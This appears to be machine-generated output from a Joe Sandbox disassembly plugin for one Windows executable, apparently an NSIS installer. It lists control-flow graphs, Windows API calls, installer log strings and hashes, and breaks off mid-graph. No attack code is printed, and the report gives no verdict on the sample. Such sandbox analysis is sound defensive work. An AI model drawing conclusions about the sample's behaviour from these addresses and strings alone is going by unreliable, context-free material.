                                                                                                                                                                                                                                                                                    control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,%MxBearing%,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,%MxBearing%,%MxBearing%,00000000,00000000,%MxBearing%,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: %MxBearing%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                                    • API String ID: 4286501637-3689784668
                                                                                                                                                                                                                                                                                    • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
